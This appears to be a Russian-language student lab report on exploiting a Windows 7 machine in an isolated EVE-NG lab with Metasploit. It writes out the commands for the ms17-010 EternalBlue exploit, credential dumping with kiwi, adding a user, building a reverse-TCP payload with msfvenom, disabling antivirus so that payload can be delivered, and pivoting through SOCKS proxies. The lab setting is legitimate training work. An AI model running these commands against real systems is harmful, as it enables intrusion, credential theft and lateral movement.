# Практика №3. Эксплутация уязвимостей. MetaSplot Framework # Задание к практической работе №3 - Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать) - Настроить каждое устройство в соответсвии со следующими параметрами: - Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP - На PfSense выполнить проброс с внешних 445/tcp и 3389/tcp портов на аналогичные порты win-7 виртуальной машины - Выполнить сканирование внешнего интерфейса межсетевого экрана с помощью nmap и Nessus с целью обнаружения уязвимых сервисов - Использую Metasploit Framework - получить доступ до Windows-7 виртуальной машины - Используя payload meterpreter: - выполнить создание нового пользователя - Выполнить скриншот рабочего стола - получить все учетные записи, находящиеся в памяти системы - Выполнить проксирование трафика во внутреннюю инфраструктуру ## Инфраструктура организации: - Kali-2021 - Linux Kali 2021 (2CPU, 2GB RAM) - FW-pfsense - PfSense Firewall 2.5.2, default config (Qemu version 4.1.0, 2CPU, 2GB RAM) - Switch - Cisco IOL-L2 (2 port-groups) - Debian - Linux Debian 10 (1CPU, 1GB RAM) - Win-10 - Windows 10 (full) (2CPU, 2GB RAM) - Win-7 - Windows 7 (full) (QEMU 2.12, 4CPU, 4GB RAM) - Network: - Pfsense Default config (WAN-DHCP, LAN - static IP) **Шаблон практической работы №3** - Internet - Cloud-1 ## Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать) **Импортируем структуру** ![](https://i.imgur.com/aEvYQmh.png) **Уменьшим память для машинок т.к. оперативной памяти только 8гб.** Основная цель операционной системы pfSense - обеспечить безопасность для домашней и деловой среды, это оборудование действует как межсетевой экран, но мы также можем использовать его в качестве основного маршрутизатора, поскольку у нас есть сотни дополнительных параметров конфигурации. ## Обновляем машинки ![](https://i.imgur.com/Rw8qS26.png) ![](https://i.imgur.com/m2Zwfz5.png) ![](https://i.imgur.com/1vM4Wtn.png) ![](https://i.imgur.com/113khFF.png) ![](https://i.imgur.com/eBQSeqG.png) ## Настроить каждое устройство в соответсвии со следующими параметрами: **Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP** DHCP (Dynamic Host Configuration Protocol) – протокол прикладного уровня модели TCP/IP, служит для назначения IP-адреса клиенту. IP-адрес можно назначать вручную каждому клиенту, то есть компьютеру в локальной сети. Но в больших сетях это очень трудозатратно, к тому же, чем больше локальная сеть, тем выше возрастает вероятность ошибки при настройке. Поэтому для автоматизации назначения IP был создан протокол DHCP. Windows7 и Windows10 получают свои адреса автоматически. ![](https://i.imgur.com/7Adw9m6.png) ![](https://i.imgur.com/g7ooZaB.png) Для устройства Debian, необходимо прописать команду `dhclient`. dhclient используется для управления адресом интерфейса по протоколу DHCP. ![](https://i.imgur.com/NaANX4K.png) Включим shh на Kali ``` sudo systemctl enable ssh sudo service ssh start ``` Пробросим порты ![](https://i.imgur.com/5IoVUBi.png) Теперь у нас есть два уязвимых порта 445 и 3389 порт 445 используется Windows для совместной работы с файлами порт 3389 - Протокол RDP используется для удаленного доступа к рабочему столу компьютера или сервера с Windows sudo nmap 192.168.115.148 -p 445,3389 -A -p - указывает сканируемые порты -A - запускает агрессивное сканирование ![](https://i.imgur.com/syfP3pL.png) ## Используя Metasploit Framework - получить доступ до Windows-7 виртуальной машины Эксплойты - это код, который эксплуатирует ошибку, неверную настройку или системный сбой. Эксплойт помогает найти ее, а потом воспользоваться, чтобы войти в систему. Для вызова Metasploit Framework: ``` msfconsole ``` ![](https://i.imgur.com/DDLzcq8.png) После этого она выдаёт информацию о том, сколько всего присутсвует в ней инструментов по категориям. Пропишем поиск: `search ms17-010` ![](https://i.imgur.com/Kl9ODqU.png) Воспользуемся eternal blue Просмотрим инфомрацию по данному эксплоиту при помощи: `info 0` ![](https://i.imgur.com/Sy4VIGU.png) Информация по эксплоиту сообщает нам о том, что он используется на Windows версии х64. ![](https://i.imgur.com/dB8A8F3.png) RHOSTS - указываем этой командой Metasploit определенный хост в сети для его изучения. Хост можно задать как по его имени, так и по IP-адресу. RPORT - задаем для Metasploit порт удаленной машины, по которому фреймворк должен подключиться к указанному хосту. По умолчанию для этого эксплоита RPORT задаётся 445. Поэтому далее нам необхдимо указать RHOST. Используем внешний IP, который сканировали раннее и запускаем. ``` set RHOSTS 192.168.115.148 run ``` ![](https://i.imgur.com/eIGjhci.png) Подключение успешно ## Используя meterpreter: **Выполнить скриншот рабочего стола** Используем команду ``` screenshot ``` ![](https://i.imgur.com/68RpKt3.png) **Получить все учетные записи, находящиеся в памяти системы** ``` load kiwi ``` Расширение Kiwi используется для выполнения различных операци1, например сброс паролей и хэшей, сохранение паролей в памяти и других. ![](https://i.imgur.com/4VpJsXp.png) Введем команду `сreds_all` Получаем данные учетных записей ![](https://i.imgur.com/DFPVu8Q.png) ## Выполнить создание нового пользователя Используем команду `run getgui -u divad -p evaeva` -u - логин -p - пароль ![](https://i.imgur.com/g0X9es9.png) Пользователь успешно создан ## Выполнить проксирование трафика во внутреннюю инфраструктуру Используем команду ``` msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.115.129 lport=4444 -f exe -o hackerfile.exe ``` -p - сокращение от “payload”, полезная нагрузка Полезная нагрузка – это вредоносный скрипт, который используетcя для взаимодействия с машиной с целью её компрометации LHOST - IP-адрес атакующего LPORT - порт вашего компьютера -f - параметр, который задает тип файла, например, exe -o - указывает наименование файла ![](https://i.imgur.com/ledTHyJ.png) Запускаем сервер `python -m http.server 80` -m - сокращение от “module”, указывает на название модуля И переходим на Windows10 по IP Kali ![](https://i.imgur.com/vTRWR0W.png) Скачиваем файл Не пропускает ![](https://i.imgur.com/0fWUh4L.png) Отключаем антивирус После отключения файл успешно скачан ![](https://i.imgur.com/RsgdH8W.png) Перейдем в kali и введем команду в meterpreter `use exploit/multi/handler` Exploit/multi/handler - это общий обработчик полезной нагрузки для приёма соединений, исходящих от автономных полезных нагрузок или эксплойтов ![](https://i.imgur.com/ZV1MaRN.png) Используем тот же payload `set payload windows/meterpreter/reverse_tcp` ![](https://i.imgur.com/gAADule.png) Меняем LHOST и LPORT на те, которые мы указали в msfvenom ``` set LHOST 0.0.0.0 set LPORT 4444 ``` ![](https://i.imgur.com/Etpx0Db.png) Запускаем его при помощи run Теперь прослушивается 4444 порт Ждём, пока жертва запустит файл. После запуска происходит reverse_tcp и у нас доступ к устройству. Смторим сеть: `ipconfig ` Нашли сеть ![](https://i.imgur.com/DifVotZ.png) autoroute - автоматически добавляет маршруты для цели в таблицу маршрутизации `run autoroute -s 192.168.1.0/24` ![](https://i.imgur.com/uljnQ6z.png) Затем используем arp-сканнер ARP Scan - показывает все IPv4 адреса устройств в сети `run arp_scanner -r 192.168.1.0/24` ![](https://i.imgur.com/nwFPhjx.png) Воспользуемся socks_proxy для создания прокси-сервера ``` use auxiliary/srver/socks_proxy ``` ![](https://i.imgur.com/8HmlJET.png) Proxychains – маскирует IP nano /etc/proxychains.conf Пропишем [ProxyList] socks5 0.0.0.0 1080 Это добавит нас как прокси-сервер в proxychains proxychains nmap -sT -sV -Pn -n -p 3389,455 192.168.1.106 -sT - отправляет TCP-пакет на порты -sV - исследует открытые порты -Pn - расценивает все хосты как работающие -n - не производить DNS разрешение -p - порты Мы можем проксировать трафик через любое устройство из локальной сети ![](https://i.imgur.com/6XDlXql.png)